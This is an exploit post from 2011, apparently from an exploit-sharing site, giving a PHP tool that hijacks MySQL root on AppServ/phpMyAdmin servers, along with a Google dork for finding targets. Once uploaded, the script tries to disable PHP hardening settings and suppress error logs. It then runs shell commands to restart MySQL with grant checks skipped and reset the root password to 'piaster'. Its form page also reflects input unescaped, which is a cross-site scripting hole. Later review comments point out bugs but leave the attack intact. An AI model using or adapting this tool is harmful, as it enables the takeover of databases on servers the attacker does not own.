# Exploit Title: [phpMyAdmin Root Password]
# Date: [21/6/2011]
# Home: 1337day.com
# Author: [Piaster (wadelamin)]
# phpmyadmin: Software Link: [www.appservnetwork.com || www.phpmyadmin.net]
# Version: [all phpmyadmin Version]
# Category:: [remote, local]
# Google dork: [inurl:phpMyAdmin || The AppServ Open Project - [all Version] for Windows ]
# Tested on: [Windows & unix]
# E-mail: [email protected]

File Bug (the AppServ-bundled MySQL root-password reset script this tool is derived from; square-bracketed parts are the author's placeholders):
//-----------------C:\AppServ\MySQL\scripts/resetpwd.php----------------// echo "Welcome to AppServ MySQL Root Password Reset Program\n\n"; AppServCMD(); function AppServCMD() { define('STDIN',fopen("php://stdin","r")); echo " Enter New Password : "; $input = trim(fgets(STDIN,256)); $input = ereg_replace('\"', "\\\"", $input); $input = ereg_replace('\'', "\'", $input); echo "\n Please wait ...................................\n\n"; exec ("net stop mysql"); exec ('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root'); //You can add a password and then request the file via the browser exec ("C:\[AppServ]\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('[root pwd]') where user = 'root';\""); exec ("C:\[AppServ]\MySQL\bin\mysqladmin -u root shutdown"); sleep(3); exec ("net start mysql"); } //--------------------------------END-----------------------------------//

I modified this file and then requested it remotely through the browser. Note that this is not a vulnerability in phpMyAdmin itself: the attacker must first already be able to upload and execute PHP on the target (through a separate file-upload flaw, a web shell, or similar), exactly as with any other uploaded tool. Once the file is on the server it is simply requested via the browser (the tool uses the short `<?` open tag, so `short_open_tag` must be enabled on the target). The "all phpMyAdmin versions" claim and the Google dork only describe where AppServ/phpMyAdmin installs can be found; they do not identify a vulnerable version. Important note: on a Windows AppServ host the script stops the MySQL service, restarts mysqld with --skip-grant-tables, overwrites the root password in mysql.user and restarts the service; if phpMyAdmin becomes reachable again immediately after the request completes, this means MySQL has been restarted and the password change has taken effect.
//---------------------------------Exploit the vulnerability tool------------------------// <?
// Post-exploitation helper: resets the MySQL root password to the fixed value
// 'piaster'. It assumes the attacker can already place and execute this PHP
// file on the target (the text above states an upload flaw or web shell is
// required first); nothing in this file exploits phpMyAdmin itself.
$f = '<a href="http://www.facebook.com/Pias.Piaster" target="_blank">Facebook</a>';
// Best-effort attempt to undo hardening ini settings and silence error
// logging. Every call is @-suppressed, so a refusal by the runtime is invisible.
@set_time_limit(0);
@ini_restore("safe_mode");
@ini_restore("allow_url_fopen");
@ini_restore("open_basedir");
@ini_restore("disable_functions");
@ini_restore("safe_mode_exec_dir");
@ini_restore("safe_mode_include_dir");
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
// Platform switch: only the first three characters of PHP_OS are compared.
$win = strtolower(substr(PHP_OS,0,3)) == "win";
// Pick the first available command-execution function.
// NOTE(review): exec/shell_exec/system/passthru are written as bare
// identifiers, not strings; this relies on PHP's undefined-constant-to-string
// fallback (a notice before PHP 8, a fatal Error on PHP 8+). If none of the
// four functions exists, $pias stays undefined and every $pias(...) call
// below fails.
if(function_exists('exec')){$pias = exec;}
elseif(function_exists('shell_exec')){$pias = shell_exec;}
elseif(function_exists('system')) {$pias = system ;}
elseif(function_exists('passthru')) { $pias = passthru ;}
if($win) {
    // Windows/AppServ path: mirrors the bundled scripts/resetpwd.php shown
    // above, but with the new password hard-coded.
    // $input is read from STDIN and escaped, then never used again; the
    // password written below is the literal 'piaster'. When the file is
    // served through a web server there is no interactive STDIN, so fgets()
    // presumably returns false here — harmless only because $input is dead.
    // NOTE(review): ereg_replace() was removed in PHP 7.
    define('STDIN',fopen("php://stdin","r"));
    $input = trim(fgets(STDIN,256));
    $input = ereg_replace('\"', "\\\"", $input);
    $input = ereg_replace('\'', "\'", $input);
    echo "\n Please wait ...................................\n\nGoodluck ... <br>USER: root & PASSWORD: piaster";
    // Stop the service, start mysqld with grant checks disabled
    // (--skip-grant-tables), overwrite root's password directly in
    // mysql.user, shut that instance down and restart the service so the
    // rewritten grant table is loaded. All paths are hard-coded to the
    // default AppServ install location; the exit status of each step is
    // never checked.
    $pias("net stop mysql");
    $pias('start /b C:\AppServ\MySQL\bin\mysqld-nt.exe --skip-grant-tables --user=root');
    $pias("C:\AppServ\MySQL\bin\mysql -e \"update mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';\"");
    $pias("C:\AppServ\MySQL\bin\mysqladmin -u root shutdown");
    sleep(3);
    $pias("net start mysql");
}
if(!$win) {
    // Non-Windows path: no command execution at all. It renders a form asking
    // for existing database credentials and, on submit, issues the UPDATE
    // through the legacy mysql extension with those credentials.
    // NOTE(review): the three $_REQUEST values are echoed unescaped into
    // HTML attribute values (reflected XSS on the tool's own page), and the
    // mysql_* extension used below was removed in PHP 7.
    echo '<br><br><br><form action="#" method="post"><p align="center"><table><tr><td>user<input name="dbu" size="20" value = ' . $_REQUEST['dbu'] . ' ><td>password<input name="dbp" size="20" value = ' . $_REQUEST['dbp'] . ' ><td>host<input name="dbh" size="20" value = ' . $_REQUEST['dbh'] . '></tr></table><input type="submit" value="GO" name = "pias" /> </p></form></td></tr><td><tr>';
    if(isset($_REQUEST['pias'])){
        $dbu = $_REQUEST['dbu'];
        $dbp = $_REQUEST['dbp'];
        // Host defaults to localhost when the field is empty (truthiness
        // test, so a host of "0" also falls back to localhost).
        $dbh = $_REQUEST['dbh']? $_REQUEST['dbh'] : 'localhost';
        // A failed connect or database selection only prints the error; the
        // UPDATE is still attempted against the (possibly false) handle.
        $conn = @mysql_connect($dbh, $dbu, $dbp);
        $select = @mysql_select_db('mysql', $conn);
        if (!$select) { echo @mysql_error();}
        // Fixed statement, no user input interpolated. No FLUSH PRIVILEGES
        // follows it; the success message tells the user to wait for a MySQL
        // restart instead — presumably because a direct UPDATE on mysql.user
        // does not take effect until the grant tables are reloaded (confirm
        // against the target's MySQL version).
        $t1 = "UPDATE mysql.user set PASSWORD=PASSWORD('piaster') where user = 'root';";
        $go1 = @mysql_query( $t1 , $conn);
        if($go1){echo '<center><br>Goodluck ... Now Wait Until Mysql Restart and Come back with USER: root & PASSWORD: piaster</center>';}
        else echo 'database mysql not acsses or not found ty agin';
    }
}
echo '<br><br>By Piaster :: [email protected] :: '. $f ;
?>